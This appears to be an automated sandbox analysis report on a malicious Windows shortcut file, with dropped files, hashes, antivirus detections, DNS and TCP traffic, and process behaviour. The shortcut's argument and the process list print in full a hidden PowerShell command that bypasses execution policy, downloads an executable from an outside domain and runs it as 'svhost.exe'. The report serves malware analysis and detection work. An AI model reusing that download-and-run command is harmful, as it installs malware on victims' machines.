                                                  SHA-512:8DE6FF66910BB39BB7CDEB2FAC3705A904D8D12723601A4CDD90C5D68BD1F309F3089F585722FA2C5DADFC2E9CA8DF50C738275EF84438B82310E03953F9F100
                                                  Malicious:false
                                                  Preview:@...e................................................@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.4....................].D.E.............System.Data.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dl1g21b.4iv.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tkd4yp5.4vu.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tbik0zf.2rj.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0spqkob.y12.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pndsvao1.r4t.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tq0dbqin.drf.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnsrzb1y.ojp.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeyz4iyq.hlj.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svhost.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1262592
                                                  Entropy (8bit):7.998247140834419
                                                  Encrypted:true
                                                  SSDEEP:24576:Yw03rS2BK40yMVrs+JBe0pw0H/bap4p16SM7RdkZu3svS/oUfsD:barS2BKOM/JBeYJfFP6SMdd6aRfs
                                                  MD5:D3713110654DC546BD5EDC306A6E7EFD
                                                  SHA1:DB266E554E96098584BCBB29AA2774106A7E90BF
                                                  SHA-256:97BFA0BD9F3B382280F67839C650A3D7BE16AA31F124810F3A9B9559E34619C6
                                                  SHA-512:35013774DA17EDF34B0D632766D54A55609D4C68B12DA758B26016E5590F349F0A5DD475041CC7DBF02960A67214F9917DA34B4C0D7BACDD839865D31FED8DE6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..c..............0..:...........Y... ........@.. ....................................`.................................8Y..S....`............................................................................... ............... ..H............text....9... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................pY......H........M...............................................................(....*..(....*..0..~.........+q. .*.......%.....(......s.....s.......s....s.........o........,...o......o.......%.,..o......,..o.....&........X...2..*..*...4....6..@........(..V........".>`..........ej........*..0..........r...p.....(..........%......(.....%......(.....%......(.....%......(..........(....s......o......~....o.....~.........(....r...pr...p.(..........%......(.....(.....o.....~....o.....~..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3f5c690594e955e6.customDestinations-ms (copy)

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5400
                                                  Entropy (8bit):3.460490990610461
                                                  Encrypted:false
                                                  SSDEEP:48:vPBls6BRnL8AIsmAs9Q+uoI8//SogZokTPM9Q+uoI8//SogZokTjH:vplZ9QAPmZ9D+dH/T09D+dH/Tr
                                                  MD5:9F73D566A530A0B1FC2724837D09E46D
                                                  SHA1:9A3C7C1C2D8C77A1F1A3EB79F019E44D3B181F2F
                                                  SHA-256:518FBC31978AD77A79734368B6CC6063DAE3C6A7AFE9E853E08D00A165F0FB00
                                                  SHA-512:075E997F617ABC4F1C53E212D081BC6AF0E20FCCF4D421EFC74D438D47720BF7450B75FEC6A4CF1B13594723A8742132FAABC39A0429E858700161EC8B6B2A4A
                                                  Malicious:false
                                                  Preview:...................................FL..................F.`.. .....a.u.....?.6..&.}>.6......a........................P.O. .:i.....+00.:...:..,.LB.)...A&...&...........-....c.u...H".?.6......2.....BV%9 .07FF58~1.LNK..........U3mBV%9....P........................0.7.f.f.5.8.0.e.-.3.c.f.d.-.4.c.4.1.-.a.9.2.e.-.4.b.a.5.3.4.d.d.1.a.0.a...l.n.k.......n...............-.......m............./......C:\Users\user\Desktop\07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk.. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........%SystemRoot%\System32\imageres.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GIDF619N8JJ3AV0K3L7X.temp

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5400
                                                  Entropy (8bit):3.460490990610461
                                                  Encrypted:false
                                                  SSDEEP:48:vPBls6BRnL8AIsmAs9Q+uoI8//SogZokTPM9Q+uoI8//SogZokTjH:vplZ9QAPmZ9D+dH/T09D+dH/Tr
                                                  MD5:9F73D566A530A0B1FC2724837D09E46D
                                                  SHA1:9A3C7C1C2D8C77A1F1A3EB79F019E44D3B181F2F
                                                  SHA-256:518FBC31978AD77A79734368B6CC6063DAE3C6A7AFE9E853E08D00A165F0FB00
                                                  SHA-512:075E997F617ABC4F1C53E212D081BC6AF0E20FCCF4D421EFC74D438D47720BF7450B75FEC6A4CF1B13594723A8742132FAABC39A0429E858700161EC8B6B2A4A
                                                  Malicious:false
                                                  Preview:...................................FL..................F.`.. .....a.u.....?.6..&.}>.6......a........................P.O. .:i.....+00.:...:..,.LB.)...A&...&...........-....c.u...H".?.6......2.....BV%9 .07FF58~1.LNK..........U3mBV%9....P........................0.7.f.f.5.8.0.e.-.3.c.f.d.-.4.c.4.1.-.a.9.2.e.-.4.b.a.5.3.4.d.d.1.a.0.a...l.n.k.......n...............-.......m............./......C:\Users\user\Desktop\07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk.. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........%SystemRoot%\System32\imageres.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\svhost.exe

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1262592
                                                  Entropy (8bit):7.998247140834419
                                                  Encrypted:true
                                                  SSDEEP:24576:Yw03rS2BK40yMVrs+JBe0pw0H/bap4p16SM7RdkZu3svS/oUfsD:barS2BKOM/JBeYJfFP6SMdd6aRfs
                                                  MD5:D3713110654DC546BD5EDC306A6E7EFD
                                                  SHA1:DB266E554E96098584BCBB29AA2774106A7E90BF
                                                  SHA-256:97BFA0BD9F3B382280F67839C650A3D7BE16AA31F124810F3A9B9559E34619C6
                                                  SHA-512:35013774DA17EDF34B0D632766D54A55609D4C68B12DA758B26016E5590F349F0A5DD475041CC7DBF02960A67214F9917DA34B4C0D7BACDD839865D31FED8DE6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..c..............0..:...........Y... ........@.. ....................................`.................................8Y..S....`............................................................................... ............... ..H............text....9... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................pY......H........M...............................................................(....*..(....*..0..~.........+q. .*.......%.....(......s.....s.......s....s.........o........,...o......o.......%.,..o......,..o.....&........X...2..*..*...4....6..@........(..V........".>`..........ej........*..0..........r...p.....(..........%......(.....%......(.....%......(.....%......(..........(....s......o......~....o.....~.........(....r...pr...p.(..........%......(.....(.....o.....~....o.....~..

                                                  Static File Info

                                                  General

                                                  File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=97, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                  Entropy (8bit):2.6703001446537837
                                                  TrID:
                                                  • Windows Shortcut (20020/1) 100.00%
                                                  File name:07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk
                                                  File size:2238
                                                  MD5:ef7f9739337bc657cd0a63e32e27d0a1
                                                  SHA1:bf67555a7272f24ceb57b1c49e4cf37dc17b246f
                                                  SHA256:a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c
                                                  SHA512:e3d0a14ac1b9165e75e619aa6f76058a4c799bb722abaeafac977c35f31ab10ad8c8a51c7f3828bb896cbf339f971974a4fb26421ba6aea52530ac84b7785ada
                                                  SSDEEP:24:8Ad/BHYVKVWU+/CWT+Oy+brUMkWq+/E4I0aHz:8A5aby+brHCAI
                                                  TLSH:3C4103104BE50324E7F29B7A6D7AE30148767C55EE52CFCC0150919C2825621F4B4F2B
                                                  File Content Preview:L..................F.@..................................a........................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                  File Icon

                                                  Icon Hash:74f4e4e4e4e9e1ed

                                                  Static Windows Shortcut Info

                                                  General

                                                  Relative Path:..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Command Line Argument:-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','%APPDATA%\svhost.exe');Start-Process '%APPDATA%\svhost.exe'
                                                  Icon location:C:\Windows\System32\imageres.dll

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 2, 2023 08:09:15.062617064 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.062683105 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.062773943 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.083594084 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.083625078 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.203605890 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.203768969 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.209753990 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.209783077 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.210397959 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.249974966 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.249999046 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.357883930 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.357947111 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.357959032 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.358021975 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.358047009 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.358072996 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.405755997 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.405869007 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.405965090 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.405998945 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.406048059 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.406059027 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.406121969 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.453543901 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.453768969 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.453768015 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.453802109 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.453839064 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.453866005 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.453957081 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.454049110 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.454076052 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.454148054 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.454179049 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.454262972 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.454296112 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.454313040 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.454344988 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.454365015 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.494162083 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.494362116 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.501844883 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.501967907 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502055883 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502073050 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502089977 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502094984 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502127886 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502192020 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502202988 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502268076 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502343893 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502451897 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502476931 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502538919 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502562046 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502578974 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502659082 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502666950 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502681971 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502710104 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502731085 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502738953 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502796888 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502821922 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502917051 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502919912 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502935886 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502989054 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.503019094 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.542584896 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.542722940 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.542757034 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.542788029 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.542815924 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.542836905 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.550576925 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550817013 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550906897 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.550935030 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550961971 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.550981045 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550985098 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551001072 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551059008 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551239967 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551351070 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551606894 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551692963 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551873922 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551949978 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552000046 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.552057028 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552083969 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.552155018 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552211046 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.552273989 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552301884 CET44349696185.101.226.22192.168.2.4

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 2, 2023 08:09:14.959439993 CET5657253192.168.2.48.8.8.8
                                                  Feb 2, 2023 08:09:15.053035021 CET53565728.8.8.8192.168.2.4
                                                  Feb 2, 2023 08:11:28.001291037 CET5091153192.168.2.48.8.8.8
                                                  Feb 2, 2023 08:11:28.033365965 CET5968353192.168.2.48.8.8.8

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Feb 2, 2023 08:09:14.959439993 CET192.168.2.48.8.8.80x5cdbStandard query (0)oiartzunirratia.eusA (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:11:28.001291037 CET192.168.2.48.8.8.80x574eStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:11:28.033365965 CET192.168.2.48.8.8.80xb18fStandard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Feb 2, 2023 08:09:15.053035021 CET8.8.8.8192.168.2.40x5cdbNo error (0)oiartzunirratia.eus185.101.226.22A (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:11:28.023376942 CET8.8.8.8192.168.2.40x574eNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                  Feb 2, 2023 08:11:28.053335905 CET8.8.8.8192.168.2.40xb18fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • oiartzunirratia.eus
                                                  • 194.26.192.248:7053

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:09:10
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                                                  Imagebase:0x7ff7b7b10000
                                                  File size:447488 bytes
                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.327507977.000001D9DA350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.327351810.000001D9DA340000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.381690727.000001D9F43C3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.327507977.000001D9DA359000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  Reputation:high

                                                  General

                                                  Target ID:1
                                                  Start time:08:09:10
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c72c0000
                                                  File size:625664 bytes
